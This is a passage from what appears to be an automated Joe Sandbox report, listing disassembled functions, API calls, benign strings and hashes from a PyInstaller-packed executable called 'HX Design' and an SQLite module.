                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2106328881.00007FFDFB2E0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2106375054.00007FFDFB441000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2106375054.00007FFDFB443000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2106375054.00007FFDFB458000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2106684657.00007FFDFB45A000.00000080.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2106731063.00007FFDFB45C000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_7ffdfb2e0000_HX Design.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: 00007A463010
                                                                                                                                                                                                                                                      • String ID: %s at line %d of [%.10s]$8653b758870e6ef0c98d46b3ace27849054af85da891eb121e9aaa537f1e8355$database corruption
                                                                                                                                                                                                                                                      • API String ID: 4225454184-3727861699
                                                                                                                                                                                                                                                      • Opcode ID: 3d911d27234210aac6b08763dd98c396f9c552569a20e5164efd14393bc372d3
                                                                                                                                                                                                                                                      • Instruction ID: 1b929060ab1f25b3a85ab1a9e46dc18b27455cfd2ecdcee17254801169625b5f
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3d911d27234210aac6b08763dd98c396f9c552569a20e5164efd14393bc372d3
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7381CF26B0968287D750AF25D064BAE77A5FB447C8F088036EB9E477A9DF38D446C701
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • GetCurrentProcessId.KERNEL32(?,?,?,?,00000000,00000000,?,00000000,00007FF732061B6A), ref: 00007FF73206295E
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2103953376.00007FF732061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF732060000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2103908905.00007FF732060000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2104011299.00007FF73208B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2104065242.00007FF73209E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2104065242.00007FF7320A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2104158416.00007FF7320A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_7ff732060000_HX Design.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: CurrentProcess
                                                                                                                                                                                                                                                      • String ID: %s: %s$Error$Error [ANSI Fallback]$[PYI-%d:ERROR]
                                                                                                                                                                                                                                                      • API String ID: 2050909247-2962405886
                                                                                                                                                                                                                                                      • Opcode ID: b3354eec44a94607d33eb4f3788ab89374ba031f66333e1b118589dca889f3f3
                                                                                                                                                                                                                                                      • Instruction ID: 512a3ce63ac4637b42a212e25544e0c80f7409538e8813506ed7afeb1f60d510
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b3354eec44a94607d33eb4f3788ab89374ba031f66333e1b118589dca889f3f3
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 88312622B1868166E720B765A8402F7E294FF887D4F800132FE8D83755EFBCD54AD620
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2103953376.00007FF732061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF732060000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2103908905.00007FF732060000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2104011299.00007FF73208B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2104065242.00007FF73209E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2104065242.00007FF7320A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2104158416.00007FF7320A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_7ff732060000_HX Design.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: DeleteDestroyDialogHandleIconIndirectModuleObjectParam
                                                                                                                                                                                                                                                      • String ID: Unhandled exception in script
                                                                                                                                                                                                                                                      • API String ID: 3081866767-2699770090
                                                                                                                                                                                                                                                      • Opcode ID: 1a8653f9ef4157c26f2335c81c204ff7a5d47729ffdf6617f9212c2ec85f79f4
                                                                                                                                                                                                                                                      • Instruction ID: 777644cc3ed31458f20c14535f226a9951ffdaa53cc1dcfabbf4cfbc9e3791a4
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1a8653f9ef4157c26f2335c81c204ff7a5d47729ffdf6617f9212c2ec85f79f4
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5031837271968199EB20FF21E8552FAA360FF88788F840135EA4D87B5ADF7CD108D710
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • GetCurrentProcessId.KERNEL32(?,00000000,00000000,FFFFFFFF,00000000,00007FF73206918F,?,00007FF732063C55), ref: 00007FF732062BA0
                                                                                                                                                                                                                                                      • MessageBoxW.USER32 ref: 00007FF732062C2A
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2103953376.00007FF732061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF732060000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2103908905.00007FF732060000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2104011299.00007FF73208B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2104065242.00007FF73209E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2104065242.00007FF7320A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2104158416.00007FF7320A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_7ff732060000_HX Design.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: CurrentMessageProcess
                                                                                                                                                                                                                                                      • String ID: WARNING$Warning$[PYI-%d:%ls]
                                                                                                                                                                                                                                                      • API String ID: 1672936522-3797743490
                                                                                                                                                                                                                                                      • Opcode ID: 4a0b6e8ebe13cae449087f655af1d2523953ec7fd560ce9a50e7097f48d063a1
                                                                                                                                                                                                                                                      • Instruction ID: 6c2ff5dee5daf53e4cd41c89d6dcd444d7a53b8cddbd14a373a39e3ef6f3afaf
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4a0b6e8ebe13cae449087f655af1d2523953ec7fd560ce9a50e7097f48d063a1
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0721F432708B41A2E710AB14F8447EAB3A4FB88780F804136EE8D93756EF7CD649C750
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • GetCurrentProcessId.KERNEL32(?,00000000,00000000,?,00000000,00007FF732061B99), ref: 00007FF732062760
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2103953376.00007FF732061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF732060000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2103908905.00007FF732060000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2104011299.00007FF73208B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2104065242.00007FF73209E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2104065242.00007FF7320A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2104158416.00007FF7320A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_7ff732060000_HX Design.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: CurrentProcess
                                                                                                                                                                                                                                                      • String ID: ERROR$Error$Error [ANSI Fallback]$[PYI-%d:%s]
                                                                                                                                                                                                                                                      • API String ID: 2050909247-1591803126
                                                                                                                                                                                                                                                      • Opcode ID: a4fe537d534c2fb53088f6f6b76b448a80ccad2508d4dc842b27f1a8247accfc
                                                                                                                                                                                                                                                      • Instruction ID: 6f0ddf64b30ce57bc7c4a3b5286dd292a5ff2cf1553aa8f40079a70b5259f87b
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a4fe537d534c2fb53088f6f6b76b448a80ccad2508d4dc842b27f1a8247accfc
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: CC21A132B19781A2E720AB54F8407EAA394FB88784F800132FE8C83759EFBCD149D750
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2103953376.00007FF732061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF732060000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2103908905.00007FF732060000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2104011299.00007FF73208B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2104065242.00007FF73209E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2104065242.00007FF7320A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2104158416.00007FF7320A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_7ff732060000_HX Design.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                                                                                                      • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                                                                                                      • API String ID: 4061214504-1276376045
                                                                                                                                                                                                                                                      • Opcode ID: b239dd027a539e56a716c05e535b4da9cb8e2339e08a4dc57142401ef2416000
                                                                                                                                                                                                                                                      • Instruction ID: 4c8ac577bc84f2e3598a64fa95ceeedc12c0a91acfa27cf058b7d1a88a5209b2
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b239dd027a539e56a716c05e535b4da9cb8e2339e08a4dc57142401ef2416000
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 29F0C221B0A706A1EE10AB24E48537AA320EF45760FD40235C67E862F4CFACD04CE360
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2103953376.00007FF732061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF732060000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2103908905.00007FF732060000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2104011299.00007FF73208B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2104065242.00007FF73209E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2104065242.00007FF7320A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2104158416.00007FF7320A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_7ff732060000_HX Design.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: _set_statfp
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 1156100317-0
                                                                                                                                                                                                                                                      • Opcode ID: bce21d2362216a5e504affcf34f2858e363de54600403cac3d1eeb36cb2ab404
                                                                                                                                                                                                                                                      • Instruction ID: 4857583898f123c196153820948167680cf688ed728d379dc45ad4bd8587d776
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: bce21d2362216a5e504affcf34f2858e363de54600403cac3d1eeb36cb2ab404
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A4118222E5CA0B22FA653165E4D137B9050EF59370F840634EBEE173D68EEC6849E120
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • FlsGetValue.KERNEL32(?,?,?,00007FF73207A5A3,?,?,00000000,00007FF73207A83E,?,?,?,?,?,00007FF73207A7CA), ref: 00007FF73207B3AF
                                                                                                                                                                                                                                                      • FlsSetValue.KERNEL32(?,?,?,00007FF73207A5A3,?,?,00000000,00007FF73207A83E,?,?,?,?,?,00007FF73207A7CA), ref: 00007FF73207B3CE
                                                                                                                                                                                                                                                      • FlsSetValue.KERNEL32(?,?,?,00007FF73207A5A3,?,?,00000000,00007FF73207A83E,?,?,?,?,?,00007FF73207A7CA), ref: 00007FF73207B3F6
                                                                                                                                                                                                                                                      • FlsSetValue.KERNEL32(?,?,?,00007FF73207A5A3,?,?,00000000,00007FF73207A83E,?,?,?,?,?,00007FF73207A7CA), ref: 00007FF73207B407
                                                                                                                                                                                                                                                      • FlsSetValue.KERNEL32(?,?,?,00007FF73207A5A3,?,?,00000000,00007FF73207A83E,?,?,?,?,?,00007FF73207A7CA), ref: 00007FF73207B418
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2103953376.00007FF732061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF732060000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2103908905.00007FF732060000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2104011299.00007FF73208B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2104065242.00007FF73209E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2104065242.00007FF7320A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2104158416.00007FF7320A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_7ff732060000_HX Design.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Value
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 3702945584-0
                                                                                                                                                                                                                                                      • Opcode ID: 6f944022d23edc1c4acf36ee41aa723466f994e0e1af3fb98e05b0010e79b0d5
                                                                                                                                                                                                                                                      • Instruction ID: d91933723b99941e9c2a813186865576ca2d83b7731c0a95a87b2dcec63515c8
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6f944022d23edc1c4acf36ee41aa723466f994e0e1af3fb98e05b0010e79b0d5
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 10117F30E0C642A2FA58B3299941179E1815F547B0FD84334E93E567D6DEACA85AE720
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2103953376.00007FF732061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF732060000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2103908905.00007FF732060000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2104011299.00007FF73208B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2104065242.00007FF73209E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2104065242.00007FF7320A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2104158416.00007FF7320A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_7ff732060000_HX Design.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Value
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 3702945584-0
                                                                                                                                                                                                                                                      • Opcode ID: cf61fb6c00b1796c5bed08ecf7b6551a73a14dc995a044f45feadad5ae41d3ad
                                                                                                                                                                                                                                                      • Instruction ID: 9a2b1dbf7c303c19e24e2778d57d8ccbda81e9d6edeae1bf8e1bec8b0bc80eeb
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: cf61fb6c00b1796c5bed08ecf7b6551a73a14dc995a044f45feadad5ae41d3ad
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B7113920E0E207A1FAA8727D481557E92824F65330FD84734D93E4A7D2DDACB85AF7B1
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • 00007FFE1A463010.VCRUNTIME140(?,?,?,?,?,?,?,00000000,00000000,?,00000003,00000000,00007FFDFB369F87,?,00000007,?), ref: 00007FFDFB369917
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2106375054.00007FFDFB2E1000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FFDFB2E0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2106328881.00007FFDFB2E0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2106375054.00007FFDFB441000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2106375054.00007FFDFB443000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2106375054.00007FFDFB458000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2106684657.00007FFDFB45A000.00000080.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2106731063.00007FFDFB45C000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_7ffdfb2e0000_HX Design.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: 00007A463010
                                                                                                                                                                                                                                                      • String ID: %.*z:%u$column%d$rowid
                                                                                                                                                                                                                                                      • API String ID: 4225454184-2903559916
                                                                                                                                                                                                                                                      • Opcode ID: efce2a594c8615c6195497c0eb65d48d2a67f449694f3429559b3ef3d31313fd
                                                                                                                                                                                                                                                      • Instruction ID: 038ab244b319e4827029765264ce789abc86db28bb39afb78d6e60c93da17c8a
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: efce2a594c8615c6195497c0eb65d48d2a67f449694f3429559b3ef3d31313fd
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 01B1B022B4A6838AEB25AB15D420FB967D2AF49B94F494235CE6D477EDDF3CE405C300
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2103953376.00007FF732061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF732060000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2103908905.00007FF732060000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2104011299.00007FF73208B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2104065242.00007FF73209E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2104065242.00007FF7320A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2104158416.00007FF7320A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_7ff732060000_HX Design.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                      • String ID: verbose
                                                                                                                                                                                                                                                      • API String ID: 3215553584-579935070
                                                                                                                                                                                                                                                      • Opcode ID: 8c3a45f75ca5c0a3459ca2e96ae2fbbf181a3d63a640e770f0a7cf37c7606cec
                                                                                                                                                                                                                                                      • Instruction ID: 3270c31eed4857952a290424676e7a39f7fd3d33aded40a8c2093a8f6b47a28d
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8c3a45f75ca5c0a3459ca2e96ae2fbbf181a3d63a640e770f0a7cf37c7606cec
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8B91E332A08A46A5F761BE28D45437EB7A1AB40B54FC84132DA5F433D6DFBCE409E360
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • 00007FFE1A463010.VCRUNTIME140(?,?,?,?,00000080,?,?,?,00000000,00007FFDFB378A6F), ref: 00007FFDFB378739
                                                                                                                                                                                                                                                      • 00007FFE1A463010.VCRUNTIME140(?,?,?,?,00000080,?,?,?,00000000,00007FFDFB378A6F), ref: 00007FFDFB3787BB
                                                                                                                                                                                                                                                      • 00007FFE1A463010.VCRUNTIME140(?,?,?,?,00000080,?,?,?,00000000,00007FFDFB378A6F), ref: 00007FFDFB3788AD
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2106375054.00007FFDFB2E1000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FFDFB2E0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2106328881.00007FFDFB2E0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2106375054.00007FFDFB441000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2106375054.00007FFDFB443000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2106375054.00007FFDFB458000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2106684657.00007FFDFB45A000.00000080.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2106731063.00007FFDFB45C000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_7ffdfb2e0000_HX Design.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: 00007A463010
                                                                                                                                                                                                                                                      • String ID: RETURNING may not use "TABLE.*" wildcards
                                                                                                                                                                                                                                                      • API String ID: 4225454184-2313493979
                                                                                                                                                                                                                                                      • Opcode ID: 17f7c90136fb561778db9ab3758a5a3b376a01926fa97c884be4e8f3c66a5517
                                                                                                                                                                                                                                                      • Instruction ID: cc23babf9bbf05fe045ddf153d9add95ab8e36e3d6f07dced58b4f27d65af066
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 17f7c90136fb561778db9ab3758a5a3b376a01926fa97c884be4e8f3c66a5517
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 13B1BE22B0AB8296E720DF16E4506A97BA1FB45BA4F158335DE7D077E9DF38E095C300
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • 00007FFE1A463010.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,?,00007FFDFB327847), ref: 00007FFDFB32D52A
                                                                                                                                                                                                                                                      • 00007FFE1A463010.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,?,00007FFDFB327847), ref: 00007FFDFB32D554
                                                                                                                                                                                                                                                      • 00007FFE1A463010.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,?,00007FFDFB327847), ref: 00007FFDFB32D5A7
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2106375054.00007FFDFB2E1000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FFDFB2E0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2106328881.00007FFDFB2E0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2106375054.00007FFDFB441000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2106375054.00007FFDFB443000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2106375054.00007FFDFB458000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2106684657.00007FFDFB45A000.00000080.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2106731063.00007FFDFB45C000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_7ffdfb2e0000_HX Design.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: 00007A463010
                                                                                                                                                                                                                                                      • String ID: H
                                                                                                                                                                                                                                                      • API String ID: 4225454184-2852464175
                                                                                                                                                                                                                                                      • Opcode ID: cfbeda1bf99951151eff030447c4d7a4d5e89bf1fbf00df94b65fd72b816f457
                                                                                                                                                                                                                                                      • Instruction ID: dd03b6b2319f218abab9a377c64f7135729883edec48a92b4f64d4337209a29d
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: cfbeda1bf99951151eff030447c4d7a4d5e89bf1fbf00df94b65fd72b816f457
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9491B062B5A64287EB24AE159560B7967E0FB84F94F544634DEBD07BECCF3CE4408B10
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2103953376.00007FF732061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF732060000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2103908905.00007FF732060000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2104011299.00007FF73208B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2104065242.00007FF73209E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2104065242.00007FF7320A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2104158416.00007FF7320A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
